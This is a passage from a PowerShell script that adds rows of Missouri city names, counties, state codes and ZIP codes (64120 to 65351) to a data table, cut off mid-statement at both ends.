city","Jackson","Missouri","MO","29","64120") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64123") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64124") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64125") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64126") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64127") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64128") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64129") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64130") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64131") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64132") + $null = $Cities.Rows.Add("Raytown","Jackson","Missouri","MO","29","64133") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64134") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64136") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64137") + $null = $Cities.Rows.Add("Raytown","Jackson","Missouri","MO","29","64138") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64139") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64145") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64146") + $null = $Cities.Rows.Add("Martin city","Jackson","Missouri","MO","29","64147") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64149") + $null = $Cities.Rows.Add("Kansas city","Platte","Missouri","MO","29","64150") + $null = $Cities.Rows.Add("Lake waukomis","Platte","Missouri","MO","29","64151") + $null = $Cities.Rows.Add("Parkville","Platte","Missouri","MO","29","64152") + $null = $Cities.Rows.Add("Kansas city","Platte","Missouri","MO","29","64153") + $null = $Cities.Rows.Add("Kansas city","Platte","Missouri","MO","29","64154") + $null = $Cities.Rows.Add("Kansas city","Clay","Missouri","MO","29","64155") + $null = $Cities.Rows.Add("Kansas city","Clay","Missouri","MO","29","64156") + $null = $Cities.Rows.Add("Kansas city","Clay","Missouri","MO","29","64157") + $null = $Cities.Rows.Add("Kansas city","Clay","Missouri","MO","29","64158") + $null = $Cities.Rows.Add("Randolph","Clay","Missouri","MO","29","64161") + $null = $Cities.Rows.Add("Ferrelview","Platte","Missouri","MO","29","64163") + $null = $Cities.Rows.Add("Kansas city","Platte","Missouri","MO","29","64164") + $null = $Cities.Rows.Add("Kansas city","Clay","Missouri","MO","29","64165") + $null = $Cities.Rows.Add("Kansas city","Clay","Missouri","MO","29","64166") + $null = $Cities.Rows.Add("Kansas city","Clay","Missouri","MO","29","64167") + $null = $Cities.Rows.Add("Kansas city","Jackson","Missouri","MO","29","64192") + $null = $Cities.Rows.Add("Zcta 641hh","Clay","Missouri","MO","29","641HH") + $null = $Cities.Rows.Add("Agency","Buchanan","Missouri","MO","29","64401") + $null = $Cities.Rows.Add("Albany","Gentry","Missouri","MO","29","64402") + $null = $Cities.Rows.Add("Amazonia","Andrew","Missouri","MO","29","64421") + $null = $Cities.Rows.Add("Amity","DeKalb","Missouri","MO","29","64422") + $null = $Cities.Rows.Add("Barnard","Nodaway","Missouri","MO","29","64423") + $null = $Cities.Rows.Add("Bethany","Harrison","Missouri","MO","29","64424") + $null = $Cities.Rows.Add("Blythedale","Harrison","Missouri","MO","29","64426") + $null = $Cities.Rows.Add("Bolckow","Andrew","Missouri","MO","29","64427") + $null = $Cities.Rows.Add("Burlington junct","Nodaway","Missouri","MO","29","64428") + $null = $Cities.Rows.Add("Cameron","Clinton","Missouri","MO","29","64429") + $null = $Cities.Rows.Add("Clarksdale","DeKalb","Missouri","MO","29","64430") + $null = $Cities.Rows.Add("Clearmont","Nodaway","Missouri","MO","29","64431") + $null = $Cities.Rows.Add("Clyde","Nodaway","Missouri","MO","29","64432") + $null = $Cities.Rows.Add("Conception","Nodaway","Missouri","MO","29","64433") + $null = $Cities.Rows.Add("Conception junct","Nodaway","Missouri","MO","29","64434") + $null = $Cities.Rows.Add("Cosby","Andrew","Missouri","MO","29","64436") + $null = $Cities.Rows.Add("Bigelow","Holt","Missouri","MO","29","64437") + $null = $Cities.Rows.Add("Darlington","Gentry","Missouri","MO","29","64438") + $null = $Cities.Rows.Add("Dearborn","Platte","Missouri","MO","29","64439") + $null = $Cities.Rows.Add("De kalb","Buchanan","Missouri","MO","29","64440") + $null = $Cities.Rows.Add("Denver","Worth","Missouri","MO","29","64441") + $null = $Cities.Rows.Add("Eagleville","Harrison","Missouri","MO","29","64442") + $null = $Cities.Rows.Add("Easton","Buchanan","Missouri","MO","29","64443") + $null = $Cities.Rows.Add("Edgerton","Platte","Missouri","MO","29","64444") + $null = $Cities.Rows.Add("Elmo","Nodaway","Missouri","MO","29","64445") + $null = $Cities.Rows.Add("Fairfax","Atchison","Missouri","MO","29","64446") + $null = $Cities.Rows.Add("Faucett","Buchanan","Missouri","MO","29","64448") + $null = $Cities.Rows.Add("Fillmore","Andrew","Missouri","MO","29","64449") + $null = $Cities.Rows.Add("Forest city","Holt","Missouri","MO","29","64451") + $null = $Cities.Rows.Add("Gentry","Gentry","Missouri","MO","29","64453") + $null = $Cities.Rows.Add("Gower","Clinton","Missouri","MO","29","64454") + $null = $Cities.Rows.Add("Graham","Nodaway","Missouri","MO","29","64455") + $null = $Cities.Rows.Add("Grant city","Worth","Missouri","MO","29","64456") + $null = $Cities.Rows.Add("Guilford","Nodaway","Missouri","MO","29","64457") + $null = $Cities.Rows.Add("Hatfield","Harrison","Missouri","MO","29","64458") + $null = $Cities.Rows.Add("Helena","Andrew","Missouri","MO","29","64459") + $null = $Cities.Rows.Add("Hopkins","Nodaway","Missouri","MO","29","64461") + $null = $Cities.Rows.Add("King city","Gentry","Missouri","MO","29","64463") + $null = $Cities.Rows.Add("Lathrop","Clinton","Missouri","MO","29","64465") + $null = $Cities.Rows.Add("Maitland","Holt","Missouri","MO","29","64466") + $null = $Cities.Rows.Add("Martinsville","Harrison","Missouri","MO","29","64467") + $null = $Cities.Rows.Add("Maryville","Nodaway","Missouri","MO","29","64468") + $null = $Cities.Rows.Add("Maysville","DeKalb","Missouri","MO","29","64469") + $null = $Cities.Rows.Add("Mound city","Holt","Missouri","MO","29","64470") + $null = $Cities.Rows.Add("New hampton","Harrison","Missouri","MO","29","64471") + $null = $Cities.Rows.Add("Oregon","Holt","Missouri","MO","29","64473") + $null = $Cities.Rows.Add("Osborn","DeKalb","Missouri","MO","29","64474") + $null = $Cities.Rows.Add("Parnell","Nodaway","Missouri","MO","29","64475") + $null = $Cities.Rows.Add("Pickering","Nodaway","Missouri","MO","29","64476") + $null = $Cities.Rows.Add("Plattsburg","Clinton","Missouri","MO","29","64477") + $null = $Cities.Rows.Add("Ravenwood","Nodaway","Missouri","MO","29","64479") + $null = $Cities.Rows.Add("Rea","Andrew","Missouri","MO","29","64480") + $null = $Cities.Rows.Add("Ridgeway","Harrison","Missouri","MO","29","64481") + $null = $Cities.Rows.Add("Rock port","Atchison","Missouri","MO","29","64482") + $null = $Cities.Rows.Add("Rosendale","Andrew","Missouri","MO","29","64483") + $null = $Cities.Rows.Add("Rushville","Buchanan","Missouri","MO","29","64484") + $null = $Cities.Rows.Add("Savannah","Andrew","Missouri","MO","29","64485") + $null = $Cities.Rows.Add("Sheridan","Worth","Missouri","MO","29","64486") + $null = $Cities.Rows.Add("Skidmore","Nodaway","Missouri","MO","29","64487") + $null = $Cities.Rows.Add("Stanberry","Gentry","Missouri","MO","29","64489") + $null = $Cities.Rows.Add("Hemple","DeKalb","Missouri","MO","29","64490") + $null = $Cities.Rows.Add("Tarkio","Atchison","Missouri","MO","29","64491") + $null = $Cities.Rows.Add("Trimble","Clinton","Missouri","MO","29","64492") + $null = $Cities.Rows.Add("Turney","Clinton","Missouri","MO","29","64493") + $null = $Cities.Rows.Add("Union star","DeKalb","Missouri","MO","29","64494") + $null = $Cities.Rows.Add("Watson","Atchison","Missouri","MO","29","64496") + $null = $Cities.Rows.Add("Weatherby","DeKalb","Missouri","MO","29","64497") + $null = $Cities.Rows.Add("Westboro","Atchison","Missouri","MO","29","64498") + $null = $Cities.Rows.Add("Worth","Worth","Missouri","MO","29","64499") + $null = $Cities.Rows.Add("Zcta 644hh","Andrew","Missouri","MO","29","644HH") + $null = $Cities.Rows.Add("Saint joseph","Buchanan","Missouri","MO","29","64501") + $null = $Cities.Rows.Add("Saint joseph","Buchanan","Missouri","MO","29","64503") + $null = $Cities.Rows.Add("Saint joseph","Buchanan","Missouri","MO","29","64504") + $null = $Cities.Rows.Add("Saint joseph","Buchanan","Missouri","MO","29","64505") + $null = $Cities.Rows.Add("Saint joseph","Buchanan","Missouri","MO","29","64506") + $null = $Cities.Rows.Add("Saint joseph","Buchanan","Missouri","MO","29","64507") + $null = $Cities.Rows.Add("Zcta 645hh","Buchanan","Missouri","MO","29","645HH") + $null = $Cities.Rows.Add("Chillicothe","Livingston","Missouri","MO","29","64601") + $null = $Cities.Rows.Add("Altamont","Daviess","Missouri","MO","29","64620") + $null = $Cities.Rows.Add("Bogard","Carroll","Missouri","MO","29","64622") + $null = $Cities.Rows.Add("Bosworth","Carroll","Missouri","MO","29","64623") + $null = $Cities.Rows.Add("Braymer","Caldwell","Missouri","MO","29","64624") + $null = $Cities.Rows.Add("Breckenridge","Caldwell","Missouri","MO","29","64625") + $null = $Cities.Rows.Add("Brookfield","Linn","Missouri","MO","29","64628") + $null = $Cities.Rows.Add("Browning","Linn","Missouri","MO","29","64630") + $null = $Cities.Rows.Add("Bucklin","Linn","Missouri","MO","29","64631") + $null = $Cities.Rows.Add("Cainsville","Harrison","Missouri","MO","29","64632") + $null = $Cities.Rows.Add("Carrollton","Carroll","Missouri","MO","29","64633") + $null = $Cities.Rows.Add("Chula","Livingston","Missouri","MO","29","64635") + $null = $Cities.Rows.Add("Coffey","Daviess","Missouri","MO","29","64636") + $null = $Cities.Rows.Add("Cowgill","Caldwell","Missouri","MO","29","64637") + $null = $Cities.Rows.Add("Dawn","Livingston","Missouri","MO","29","64638") + $null = $Cities.Rows.Add("De witt","Carroll","Missouri","MO","29","64639") + $null = $Cities.Rows.Add("Gallatin","Daviess","Missouri","MO","29","64640") + $null = $Cities.Rows.Add("Galt","Grundy","Missouri","MO","29","64641") + $null = $Cities.Rows.Add("Gilman city","Harrison","Missouri","MO","29","64642") + $null = $Cities.Rows.Add("Hale","Carroll","Missouri","MO","29","64643") + $null = $Cities.Rows.Add("Hamilton","Caldwell","Missouri","MO","29","64644") + $null = $Cities.Rows.Add("Harris","Sullivan","Missouri","MO","29","64645") + $null = $Cities.Rows.Add("Humphreys","Sullivan","Missouri","MO","29","64646") + $null = $Cities.Rows.Add("Jameson","Daviess","Missouri","MO","29","64647") + $null = $Cities.Rows.Add("Jamesport","Daviess","Missouri","MO","29","64648") + $null = $Cities.Rows.Add("Kidder","Caldwell","Missouri","MO","29","64649") + $null = $Cities.Rows.Add("Kingston","Caldwell","Missouri","MO","29","64650") + $null = $Cities.Rows.Add("Laclede","Linn","Missouri","MO","29","64651") + $null = $Cities.Rows.Add("Laredo","Grundy","Missouri","MO","29","64652") + $null = $Cities.Rows.Add("Linneus","Linn","Missouri","MO","29","64653") + $null = $Cities.Rows.Add("Lucerne","Putnam","Missouri","MO","29","64655") + $null = $Cities.Rows.Add("Ludlow","Livingston","Missouri","MO","29","64656") + $null = $Cities.Rows.Add("Mc fall","Gentry","Missouri","MO","29","64657") + $null = $Cities.Rows.Add("Marceline","Linn","Missouri","MO","29","64658") + $null = $Cities.Rows.Add("Meadville","Linn","Missouri","MO","29","64659") + $null = $Cities.Rows.Add("Mendon","Chariton","Missouri","MO","29","64660") + $null = $Cities.Rows.Add("Mercer","Mercer","Missouri","MO","29","64661") + $null = $Cities.Rows.Add("Mooresville","Livingston","Missouri","MO","29","64664") + $null = $Cities.Rows.Add("Newtown","Sullivan","Missouri","MO","29","64667") + $null = $Cities.Rows.Add("Norborne","Carroll","Missouri","MO","29","64668") + $null = $Cities.Rows.Add("Pattonsburg","Daviess","Missouri","MO","29","64670") + $null = $Cities.Rows.Add("Polo","Caldwell","Missouri","MO","29","64671") + $null = $Cities.Rows.Add("Powersville","Putnam","Missouri","MO","29","64672") + $null = $Cities.Rows.Add("Princeton","Mercer","Missouri","MO","29","64673") + $null = $Cities.Rows.Add("Purdin","Linn","Missouri","MO","29","64674") + $null = $Cities.Rows.Add("Rothville","Chariton","Missouri","MO","29","64676") + $null = $Cities.Rows.Add("Spickard","Grundy","Missouri","MO","29","64679") + $null = $Cities.Rows.Add("Sumner","Chariton","Missouri","MO","29","64681") + $null = $Cities.Rows.Add("Tina","Carroll","Missouri","MO","29","64682") + $null = $Cities.Rows.Add("Trenton","Grundy","Missouri","MO","29","64683") + $null = $Cities.Rows.Add("Utica","Livingston","Missouri","MO","29","64686") + $null = $Cities.Rows.Add("Wheeling","Livingston","Missouri","MO","29","64688") + $null = $Cities.Rows.Add("Winston","Daviess","Missouri","MO","29","64689") + $null = $Cities.Rows.Add("Zcta 646hh","Carroll","Missouri","MO","29","646HH") + $null = $Cities.Rows.Add("Harrisonville","Cass","Missouri","MO","29","64701") + $null = $Cities.Rows.Add("Adrian","Bates","Missouri","MO","29","64720") + $null = $Cities.Rows.Add("Amoret","Bates","Missouri","MO","29","64722") + $null = $Cities.Rows.Add("Amsterdam","Bates","Missouri","MO","29","64723") + $null = $Cities.Rows.Add("Appleton city","St. Clair","Missouri","MO","29","64724") + $null = $Cities.Rows.Add("Archie","Cass","Missouri","MO","29","64725") + $null = $Cities.Rows.Add("Blairstown","Henry","Missouri","MO","29","64726") + $null = $Cities.Rows.Add("Bronaugh","Vernon","Missouri","MO","29","64728") + $null = $Cities.Rows.Add("Butler","Bates","Missouri","MO","29","64730") + $null = $Cities.Rows.Add("Chilhowee","Johnson","Missouri","MO","29","64733") + $null = $Cities.Rows.Add("Cleveland","Cass","Missouri","MO","29","64734") + $null = $Cities.Rows.Add("Tightwad","Henry","Missouri","MO","29","64735") + $null = $Cities.Rows.Add("Collins","St. Clair","Missouri","MO","29","64738") + $null = $Cities.Rows.Add("Creighton","Cass","Missouri","MO","29","64739") + $null = $Cities.Rows.Add("Deepwater","Henry","Missouri","MO","29","64740") + $null = $Cities.Rows.Add("Deerfield","Vernon","Missouri","MO","29","64741") + $null = $Cities.Rows.Add("Drexel","Cass","Missouri","MO","29","64742") + $null = $Cities.Rows.Add("East lynne","Cass","Missouri","MO","29","64743") + $null = $Cities.Rows.Add("El dorado spring","Cedar","Missouri","MO","29","64744") + $null = $Cities.Rows.Add("Foster","Bates","Missouri","MO","29","64745") + $null = $Cities.Rows.Add("Freeman","Cass","Missouri","MO","29","64746") + $null = $Cities.Rows.Add("Garden city","Cass","Missouri","MO","29","64747") + $null = $Cities.Rows.Add("Golden city","Barton","Missouri","MO","29","64748") + $null = $Cities.Rows.Add("Harwood","Vernon","Missouri","MO","29","64750") + $null = $Cities.Rows.Add("Horton","Vernon","Missouri","MO","29","64751") + $null = $Cities.Rows.Add("Stotesbury","Bates","Missouri","MO","29","64752") + $null = $Cities.Rows.Add("Jasper","Jasper","Missouri","MO","29","64755") + $null = $Cities.Rows.Add("Jerico springs","Cedar","Missouri","MO","29","64756") + $null = $Cities.Rows.Add("Iantha","Barton","Missouri","MO","29","64759") + $null = $Cities.Rows.Add("Leeton","Johnson","Missouri","MO","29","64761") + $null = $Cities.Rows.Add("Liberal","Barton","Missouri","MO","29","64762") + $null = $Cities.Rows.Add("Lowry city","St. Clair","Missouri","MO","29","64763") + $null = $Cities.Rows.Add("Milo","Vernon","Missouri","MO","29","64767") + $null = $Cities.Rows.Add("Mindenmines","Barton","Missouri","MO","29","64769") + $null = $Cities.Rows.Add("Montrose","Henry","Missouri","MO","29","64770") + $null = $Cities.Rows.Add("Moundville","Vernon","Missouri","MO","29","64771") + $null = $Cities.Rows.Add("Nevada","Vernon","Missouri","MO","29","64772") + $null = $Cities.Rows.Add("Osceola","St. Clair","Missouri","MO","29","64776") + $null = $Cities.Rows.Add("Richards","Vernon","Missouri","MO","29","64778") + $null = $Cities.Rows.Add("Rich hill","Bates","Missouri","MO","29","64779") + $null = $Cities.Rows.Add("Rockville","Bates","Missouri","MO","29","64780") + $null = $Cities.Rows.Add("Roscoe","St. Clair","Missouri","MO","29","64781") + $null = $Cities.Rows.Add("Schell city","Vernon","Missouri","MO","29","64783") + $null = $Cities.Rows.Add("Sheldon","Vernon","Missouri","MO","29","64784") + $null = $Cities.Rows.Add("Urich","Henry","Missouri","MO","29","64788") + $null = $Cities.Rows.Add("Walker","Vernon","Missouri","MO","29","64790") + $null = $Cities.Rows.Add("Zcta 647hh","Henry","Missouri","MO","29","647HH") + $null = $Cities.Rows.Add("Joplin","Jasper","Missouri","MO","29","64801") + $null = $Cities.Rows.Add("Joplin","Jasper","Missouri","MO","29","64804") + $null = $Cities.Rows.Add("Alba","Jasper","Missouri","MO","29","64830") + $null = $Cities.Rows.Add("Anderson","McDonald","Missouri","MO","29","64831") + $null = $Cities.Rows.Add("Asbury","Jasper","Missouri","MO","29","64832") + $null = $Cities.Rows.Add("Avilla","Jasper","Missouri","MO","29","64833") + $null = $Cities.Rows.Add("Carl junction","Jasper","Missouri","MO","29","64834") + $null = $Cities.Rows.Add("Carterville","Jasper","Missouri","MO","29","64835") + $null = $Cities.Rows.Add("Carthage","Jasper","Missouri","MO","29","64836") + $null = $Cities.Rows.Add("Diamond","Newton","Missouri","MO","29","64840") + $null = $Cities.Rows.Add("Duenweg","Jasper","Missouri","MO","29","64841") + $null = $Cities.Rows.Add("Fairview","Newton","Missouri","MO","29","64842") + $null = $Cities.Rows.Add("Goodman","McDonald","Missouri","MO","29","64843") + $null = $Cities.Rows.Add("Granby","Newton","Missouri","MO","29","64844") + $null = $Cities.Rows.Add("Lanagan","McDonald","Missouri","MO","29","64847") + $null = $Cities.Rows.Add("La russell","Lawrence","Missouri","MO","29","64848") + $null = $Cities.Rows.Add("Neck city","Jasper","Missouri","MO","29","64849") + $null = $Cities.Rows.Add("Neosho","Newton","Missouri","MO","29","64850") + $null = $Cities.Rows.Add("Noel","McDonald","Missouri","MO","29","64854") + $null = $Cities.Rows.Add("Oronogo","Jasper","Missouri","MO","29","64855") + $null = $Cities.Rows.Add("Jane","McDonald","Missouri","MO","29","64856") + $null = $Cities.Rows.Add("Purcell","Jasper","Missouri","MO","29","64857") + $null = $Cities.Rows.Add("Racine","Newton","Missouri","MO","29","64858") + $null = $Cities.Rows.Add("Reeds","Jasper","Missouri","MO","29","64859") + $null = $Cities.Rows.Add("Rocky comfort","McDonald","Missouri","MO","29","64861") + $null = $Cities.Rows.Add("Sarcoxie","Jasper","Missouri","MO","29","64862") + $null = $Cities.Rows.Add("South west city","McDonald","Missouri","MO","29","64863") + $null = $Cities.Rows.Add("Seneca","Newton","Missouri","MO","29","64865") + $null = $Cities.Rows.Add("Stark city","Newton","Missouri","MO","29","64866") + $null = $Cities.Rows.Add("Stella","McDonald","Missouri","MO","29","64867") + $null = $Cities.Rows.Add("Webb city","Jasper","Missouri","MO","29","64870") + $null = $Cities.Rows.Add("Wentworth","Lawrence","Missouri","MO","29","64873") + $null = $Cities.Rows.Add("Wheaton","Barry","Missouri","MO","29","64874") + $null = $Cities.Rows.Add("Argyle","Osage","Missouri","MO","29","65001") + $null = $Cities.Rows.Add("Ashland","Boone","Missouri","MO","29","65010") + $null = $Cities.Rows.Add("Barnett","Morgan","Missouri","MO","29","65011") + $null = $Cities.Rows.Add("Belle","Maries","Missouri","MO","29","65013") + $null = $Cities.Rows.Add("Bland","Gasconade","Missouri","MO","29","65014") + $null = $Cities.Rows.Add("Bonnots mill","Osage","Missouri","MO","29","65016") + $null = $Cities.Rows.Add("Brumley","Miller","Missouri","MO","29","65017") + $null = $Cities.Rows.Add("California","Moniteau","Missouri","MO","29","65018") + $null = $Cities.Rows.Add("Camdenton","Camden","Missouri","MO","29","65020") + $null = $Cities.Rows.Add("Centertown","Cole","Missouri","MO","29","65023") + $null = $Cities.Rows.Add("Chamois","Osage","Missouri","MO","29","65024") + $null = $Cities.Rows.Add("Clarksburg","Moniteau","Missouri","MO","29","65025") + $null = $Cities.Rows.Add("Eldon","Miller","Missouri","MO","29","65026") + $null = $Cities.Rows.Add("Eugene","Cole","Missouri","MO","29","65032") + $null = $Cities.Rows.Add("Fortuna","Moniteau","Missouri","MO","29","65034") + $null = $Cities.Rows.Add("Freeburg","Osage","Missouri","MO","29","65035") + $null = $Cities.Rows.Add("Gasconade","Gasconade","Missouri","MO","29","65036") + $null = $Cities.Rows.Add("Gravois mills","Morgan","Missouri","MO","29","65037") + $null = $Cities.Rows.Add("Hartsburg","Boone","Missouri","MO","29","65039") + $null = $Cities.Rows.Add("Henley","Cole","Missouri","MO","29","65040") + $null = $Cities.Rows.Add("Bay","Gasconade","Missouri","MO","29","65041") + $null = $Cities.Rows.Add("Holts summit","Callaway","Missouri","MO","29","65043") + $null = $Cities.Rows.Add("Jamestown","Moniteau","Missouri","MO","29","65046") + $null = $Cities.Rows.Add("Kaiser","Miller","Missouri","MO","29","65047") + $null = $Cities.Rows.Add("Koeltztown","Osage","Missouri","MO","29","65048") + $null = $Cities.Rows.Add("Four seasons","Camden","Missouri","MO","29","65049") + $null = $Cities.Rows.Add("Latham","Moniteau","Missouri","MO","29","65050") + $null = $Cities.Rows.Add("Linn","Osage","Missouri","MO","29","65051") + $null = $Cities.Rows.Add("Linn creek","Camden","Missouri","MO","29","65052") + $null = $Cities.Rows.Add("Lohman","Cole","Missouri","MO","29","65053") + $null = $Cities.Rows.Add("Loose creek","Osage","Missouri","MO","29","65054") + $null = $Cities.Rows.Add("Meta","Maries","Missouri","MO","29","65058") + $null = $Cities.Rows.Add("Mokane","Callaway","Missouri","MO","29","65059") + $null = $Cities.Rows.Add("Morrison","Gasconade","Missouri","MO","29","65061") + $null = $Cities.Rows.Add("Mount sterling","Osage","Missouri","MO","29","65062") + $null = $Cities.Rows.Add("New bloomfield","Callaway","Missouri","MO","29","65063") + $null = $Cities.Rows.Add("Olean","Miller","Missouri","MO","29","65064") + $null = $Cities.Rows.Add("Osage beach","Camden","Missouri","MO","29","65065") + $null = $Cities.Rows.Add("Owensville","Gasconade","Missouri","MO","29","65066") + $null = $Cities.Rows.Add("Portland","Callaway","Missouri","MO","29","65067") + $null = $Cities.Rows.Add("Prairie home","Cooper","Missouri","MO","29","65068") + $null = $Cities.Rows.Add("Rhineland","Montgomery","Missouri","MO","29","65069") + $null = $Cities.Rows.Add("Rocky mount","Morgan","Missouri","MO","29","65072") + $null = $Cities.Rows.Add("Russellville","Cole","Missouri","MO","29","65074") + $null = $Cities.Rows.Add("Saint elizabeth","Miller","Missouri","MO","29","65075") + $null = $Cities.Rows.Add("Saint thomas","Cole","Missouri","MO","29","65076") + $null = $Cities.Rows.Add("Steedman","Callaway","Missouri","MO","29","65077") + $null = $Cities.Rows.Add("Stover","Morgan","Missouri","MO","29","65078") + $null = $Cities.Rows.Add("Sunrise beach","Camden","Missouri","MO","29","65079") + $null = $Cities.Rows.Add("Tebbetts","Callaway","Missouri","MO","29","65080") + $null = $Cities.Rows.Add("Tipton","Moniteau","Missouri","MO","29","65081") + $null = $Cities.Rows.Add("Tuscumbia","Miller","Missouri","MO","29","65082") + $null = $Cities.Rows.Add("Ulman","Miller","Missouri","MO","29","65083") + $null = $Cities.Rows.Add("Versailles","Morgan","Missouri","MO","29","65084") + $null = $Cities.Rows.Add("Westphalia","Osage","Missouri","MO","29","65085") + $null = $Cities.Rows.Add("Zcta 650hh","Boone","Missouri","MO","29","650HH") + $null = $Cities.Rows.Add("Jefferson city","Cole","Missouri","MO","29","65101") + $null = $Cities.Rows.Add("Jefferson city","Cole","Missouri","MO","29","65109") + $null = $Cities.Rows.Add("Zcta 651hh","Cole","Missouri","MO","29","651HH") + $null = $Cities.Rows.Add("Columbia","Boone","Missouri","MO","29","65201") + $null = $Cities.Rows.Add("Columbia","Boone","Missouri","MO","29","65202") + $null = $Cities.Rows.Add("Columbia","Boone","Missouri","MO","29","65203") + $null = $Cities.Rows.Add("Armstrong","Howard","Missouri","MO","29","65230") + $null = $Cities.Rows.Add("Auxvasse","Callaway","Missouri","MO","29","65231") + $null = $Cities.Rows.Add("Benton city","Audrain","Missouri","MO","29","65232") + $null = $Cities.Rows.Add("Boonville","Cooper","Missouri","MO","29","65233") + $null = $Cities.Rows.Add("Brunswick","Chariton","Missouri","MO","29","65236") + $null = $Cities.Rows.Add("Bunceton","Cooper","Missouri","MO","29","65237") + $null = $Cities.Rows.Add("Cairo","Randolph","Missouri","MO","29","65239") + $null = $Cities.Rows.Add("Centralia","Boone","Missouri","MO","29","65240") + $null = $Cities.Rows.Add("Clark","Randolph","Missouri","MO","29","65243") + $null = $Cities.Rows.Add("Clifton hill","Randolph","Missouri","MO","29","65244") + $null = $Cities.Rows.Add("Dalton","Chariton","Missouri","MO","29","65246") + $null = $Cities.Rows.Add("Excello","Macon","Missouri","MO","29","65247") + $null = $Cities.Rows.Add("Fayette","Howard","Missouri","MO","29","65248") + $null = $Cities.Rows.Add("Franklin","Howard","Missouri","MO","29","65250") + $null = $Cities.Rows.Add("Fulton","Callaway","Missouri","MO","29","65251") + $null = $Cities.Rows.Add("Glasgow","Howard","Missouri","MO","29","65254") + $null = $Cities.Rows.Add("Hallsville","Boone","Missouri","MO","29","65255") + $null = $Cities.Rows.Add("Harrisburg","Boone","Missouri","MO","29","65256") + $null = $Cities.Rows.Add("Higbee","Randolph","Missouri","MO","29","65257") + $null = $Cities.Rows.Add("Holliday","Monroe","Missouri","MO","29","65258") + $null = $Cities.Rows.Add("Huntsville","Randolph","Missouri","MO","29","65259") + $null = $Cities.Rows.Add("Jacksonville","Randolph","Missouri","MO","29","65260") + $null = $Cities.Rows.Add("Keytesville","Chariton","Missouri","MO","29","65261") + $null = $Cities.Rows.Add("Kingdom city","Callaway","Missouri","MO","29","65262") + $null = $Cities.Rows.Add("Madison","Monroe","Missouri","MO","29","65263") + $null = $Cities.Rows.Add("Martinsburg","Audrain","Missouri","MO","29","65264") + $null = $Cities.Rows.Add("Mexico","Audrain","Missouri","MO","29","65265") + $null = $Cities.Rows.Add("Moberly","Randolph","Missouri","MO","29","65270") + $null = $Cities.Rows.Add("New franklin","Howard","Missouri","MO","29","65274") + $null = $Cities.Rows.Add("Paris","Monroe","Missouri","MO","29","65275") + $null = $Cities.Rows.Add("Pilot grove","Cooper","Missouri","MO","29","65276") + $null = $Cities.Rows.Add("Renick","Randolph","Missouri","MO","29","65278") + $null = $Cities.Rows.Add("Rocheport","Boone","Missouri","MO","29","65279") + $null = $Cities.Rows.Add("Rush hill","Audrain","Missouri","MO","29","65280") + $null = $Cities.Rows.Add("Salisbury","Chariton","Missouri","MO","29","65281") + $null = $Cities.Rows.Add("Santa fe","Monroe","Missouri","MO","29","65282") + $null = $Cities.Rows.Add("Stoutsville","Monroe","Missouri","MO","29","65283") + $null = $Cities.Rows.Add("Sturgeon","Boone","Missouri","MO","29","65284") + $null = $Cities.Rows.Add("Thompson","Audrain","Missouri","MO","29","65285") + $null = $Cities.Rows.Add("Triplett","Chariton","Missouri","MO","29","65286") + $null = $Cities.Rows.Add("Wooldridge","Cooper","Missouri","MO","29","65287") + $null = $Cities.Rows.Add("Zcta 652hh","Boone","Missouri","MO","29","652HH") + $null = $Cities.Rows.Add("Sedalia","Pettis","Missouri","MO","29","65301") + $null = $Cities.Rows.Add("Whiteman afb","Johnson","Missouri","MO","29","65305") + $null = $Cities.Rows.Add("Arrow rock","Saline","Missouri","MO","29","65320") + $null = $Cities.Rows.Add("Blackburn","Saline","Missouri","MO","29","65321") + $null = $Cities.Rows.Add("Blackwater","Cooper","Missouri","MO","29","65322") + $null = $Cities.Rows.Add("Calhoun","Henry","Missouri","MO","29","65323") + $null = $Cities.Rows.Add("Climax springs","Camden","Missouri","MO","29","65324") + $null = $Cities.Rows.Add("Cole camp","Benton","Missouri","MO","29","65325") + $null = $Cities.Rows.Add("Edwards","Benton","Missouri","MO","29","65326") + $null = $Cities.Rows.Add("Emma","Saline","Missouri","MO","29","65327") + $null = $Cities.Rows.Add("Florence","Morgan","Missouri","MO","29","65329") + $null = $Cities.Rows.Add("Gilliam","Saline","Missouri","MO","29","65330") + $null = $Cities.Rows.Add("Green ridge","Pettis","Missouri","MO","29","65332") + $null = $Cities.Rows.Add("Houstonia","Pettis","Missouri","MO","29","65333") + $null = $Cities.Rows.Add("Hughesville","Pettis","Missouri","MO","29","65334") + $null = $Cities.Rows.Add("Ionia","Benton","Missouri","MO","29","65335") + $null = $Cities.Rows.Add("Knob noster","Johnson","Missouri","MO","29","65336") + $null = $Cities.Rows.Add("La monte","Pettis","Missouri","MO","29","65337") + $null = $Cities.Rows.Add("Lincoln","Benton","Missouri","MO","29","65338") + $null = $Cities.Rows.Add("Grand pass","Saline","Missouri","MO","29","65339") + $null = $Cities.Rows.Add("Napton","Saline","Missouri","MO","29","65340") + $null = $Cities.Rows.Add("Miami","Saline","Missouri","MO","29","65344") + $null = $Cities.Rows.Add("Mora","Pettis","Missouri","MO","29","65345") + $null = $Cities.Rows.Add("Nelson","Saline","Missouri","MO","29","65347") + $null = $Cities.Rows.Add("Otterville","Cooper","Missouri","MO","29","65348") + $null = $Cities.Rows.Add("Slater","Saline","Missouri","MO","29","65349") + $null = $Cities.Rows.Add("Smithton","Pettis","Missouri","MO","29","65350") + $null = $Cities.Rows.Add("Sweet springs","Saline","Missouri","MO","29","65351") + $null = 